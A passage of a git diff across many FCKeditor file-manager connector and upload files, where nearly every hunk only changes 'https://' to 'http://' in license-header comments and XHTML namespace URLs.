http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/io.pl b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/io.pl index b2e6c57..7b88cf8 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/io.pl +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/io.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/upload_fck.pl b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/upload_fck.pl index e4fd764..140b8ea 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/upload_fck.pl +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/upload_fck.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/util.pl b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/util.pl index 9248059..c6c2a0d 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/util.pl +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/util.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/basexml.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/basexml.php index 28c47d7..ed22466 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/basexml.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/basexml.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php index bdf5646..eef6119 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/config.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/config.php index 256920b..97fbc6d 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/config.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/config.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php index c25210d..510c6da 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/io.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/io.php index 3d45bcc..2028426 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/io.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/io.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/util.php b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/util.php index 039adf8..ffb2412 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/util.php +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/util.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py b/admin/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py index 4230ddb..d8fce79 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -FCKeditor - The text editor for Internet - https://www.fckeditor.net +FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2007 Frederico Caldeira Knabben == BEGIN LICENSE == @@ -10,13 +10,13 @@ Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") - https://www.gnu.org/licenses/gpl.html + http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - https://www.gnu.org/licenses/lgpl.html + http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") - https://www.mozilla.org/MPL/MPL-1.1.html + http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == @@ -136,7 +136,7 @@ The connector class class FCKeditorConnector(object): # Configuration for FCKEditor # can point to another server here, if linked correctly - #WEB_HOST = "https://127.0.0.1/" + #WEB_HOST = "http://127.0.0.1/" WEB_HOST = "" SERVER_DIR = "/var/www/html/" diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html b/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html index e00d3ae..886148d 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,20 +8,20 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Test page for the File Browser connectors. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Connectors Tests</title> <script type="text/javascript"> diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmactualfolder.html b/admin/FCKeditor/editor/filemanager/browser/default/frmactualfolder.html index f39a8ab..5c4ee03 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmactualfolder.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmactualfolder.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html b/admin/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html index 0dad15a..fa73c59 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmfolders.html b/admin/FCKeditor/editor/filemanager/browser/default/frmfolders.html index b410531..fccd7df 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmfolders.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmfolders.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html b/admin/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html index 10db007..e6f5dc6 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This page shows all resources available in a folder in the File Browser. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="browser.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="js/common.js"></script> diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmresourcetype.html b/admin/FCKeditor/editor/filemanager/browser/default/frmresourcetype.html index cfd5776..976039c 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmresourcetype.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmresourcetype.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/frmupload.html b/admin/FCKeditor/editor/filemanager/browser/default/frmupload.html index 003c27b..a7910b2 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/frmupload.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/frmupload.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Page used to upload new files in the current folder. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="browser.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="js/common.js"></script> diff --git a/admin/FCKeditor/editor/filemanager/browser/default/js/common.js b/admin/FCKeditor/editor/filemanager/browser/default/js/common.js index b687634..ad486e7 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/js/common.js +++ b/admin/FCKeditor/editor/filemanager/browser/default/js/common.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/js/fckxml.js b/admin/FCKeditor/editor/filemanager/browser/default/js/fckxml.js index 24605fd..9acdc7f 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/js/fckxml.js +++ b/admin/FCKeditor/editor/filemanager/browser/default/js/fckxml.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/asp/class_upload.asp b/admin/FCKeditor/editor/filemanager/upload/asp/class_upload.asp index 7a576ac..3066bdd 100755 --- a/admin/FCKeditor/editor/filemanager/upload/asp/class_upload.asp +++ b/admin/FCKeditor/editor/filemanager/upload/asp/class_upload.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/asp/config.asp b/admin/FCKeditor/editor/filemanager/upload/asp/config.asp index 621a680..1dc6295 100755 --- a/admin/FCKeditor/editor/filemanager/upload/asp/config.asp +++ b/admin/FCKeditor/editor/filemanager/upload/asp/config.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/asp/io.asp b/admin/FCKeditor/editor/filemanager/upload/asp/io.asp index c6f214e..a20f0ba 100755 --- a/admin/FCKeditor/editor/filemanager/upload/asp/io.asp +++ b/admin/FCKeditor/editor/filemanager/upload/asp/io.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/asp/upload.asp b/admin/FCKeditor/editor/filemanager/upload/asp/upload.asp index 06f42eb..8e091c0 100755 --- a/admin/FCKeditor/editor/filemanager/upload/asp/upload.asp +++ b/admin/FCKeditor/editor/filemanager/upload/asp/upload.asp @@ -4,7 +4,7 @@ Option Explicit Response.Buffer = True %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -13,13 +13,13 @@ Response.Buffer = True * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/aspx/upload.aspx b/admin/FCKeditor/editor/filemanager/upload/aspx/upload.aspx index ac1a04a..6399976 100755 --- a/admin/FCKeditor/editor/filemanager/upload/aspx/upload.aspx +++ b/admin/FCKeditor/editor/filemanager/upload/aspx/upload.aspx @@ -1,6 +1,6 @@ <%@ Page language="c#" Trace="false" Inherits="FredCK.FCKeditorV2.Uploader" AutoEventWireup="false" %> <%-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -26,5 +26,5 @@ * include that DLL in your "bin" directory. * * To download the FCKeditor.Net package, go to our official web site: - * https://www.fckeditor.net + * http://www.fckeditor.net --%> \ No newline at end of file diff --git a/admin/FCKeditor/editor/filemanager/upload/cfm/config.cfm b/admin/FCKeditor/editor/filemanager/upload/cfm/config.cfm index 153938f..82a973d 100755 --- a/admin/FCKeditor/editor/filemanager/upload/cfm/config.cfm +++ b/admin/FCKeditor/editor/filemanager/upload/cfm/config.cfm @@ -1,5 +1,5 @@ <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/cfm/upload.cfm b/admin/FCKeditor/editor/filemanager/upload/cfm/upload.cfm index 377d725..9218230 100755 --- a/admin/FCKeditor/editor/filemanager/upload/cfm/upload.cfm +++ b/admin/FCKeditor/editor/filemanager/upload/cfm/upload.cfm @@ -1,5 +1,5 @@ <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/lasso/config.lasso b/admin/FCKeditor/editor/filemanager/upload/lasso/config.lasso index 67ce729..c6a6341 100755 --- a/admin/FCKeditor/editor/filemanager/upload/lasso/config.lasso +++ b/admin/FCKeditor/editor/filemanager/upload/lasso/config.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text 